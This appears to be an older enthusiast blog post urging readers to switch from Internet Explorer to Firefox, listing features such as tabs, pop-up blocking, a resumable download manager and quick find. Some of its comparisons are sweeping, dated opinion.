How many of you have always used Internet Explorer (IE) to browse the Net and never really looked at any of the other browsers available? I have always used IE and have been quite comfortable with it until I found what Firefox has to offer.... and believe me it was worth the switch. I enumerate below some of the many plus points of Firefox and you can decide for yourself whether it is indeed worth the change. The google search tool is incorporated in Firefox. In Internet Explorer (IE) you have to either download the google toolbar or perhaps set your homepage to google or add it to your favourites. On Firefox it is always available and the search is faster. Tabs besides windows for quicker browsing : Allows you to open a link in a new tab or a new window. IE gives you the option to open a link in a new window only. Having too many windows open can be very annoying and time consuming. This facility of Firefox to have several tabs in one window is very good. It’s easy, quick and saves a lot of time navigating between windows; it’s faster navigating between windows. If you want to open several bookmarks in one shot, you have to put them in one folder under bookmarks and open them in tabs. This is just not possible in IE – you cannot open several sites in a folder under “Favourites”. It has it’s own batch download program. You can pause your download and continue it at a later time, something which is not possible with IE’s download manager. The download manager stores information such as file size and location of your downloaded file. When the download is complete, a small notification is displayed in the lower right side of the screen. In IE, if your internet connection fails you have to start from scratch all over again. Security : Internet Explorer has some major security holes. Firefox has none. You can drag and drop any link right into the top of the browser and it automatically adds a button. No more Pop-Ups to annoy you. The default settings will allow no pop-ups but you get a message just above the web page displayed saying that popups from that website have been blocked. You can change the settings to allow for popups to be displayed for certain sites as the need maybe or not at all. In IE you need to use a third-party software to achieve the same thing. Memory usage : Internet Explorer uses far more memory than Firefox. Faster browsing so you spend less time waiting. Firefox is free while IE is not. Firefox is comparatively smaller in size and the download takes only a few minutes. In Firefox you have more space as the History button is missing but you can have the sidebar for History (you will find it under View menu) To search for any text on a particular web page, you would normally use Ctrl + F. Now you can do that even faster by pressing the "forward slash" key (it's the one that shares the key with the question mark on your keyboard) and thentype in what ypu want to search as usual.
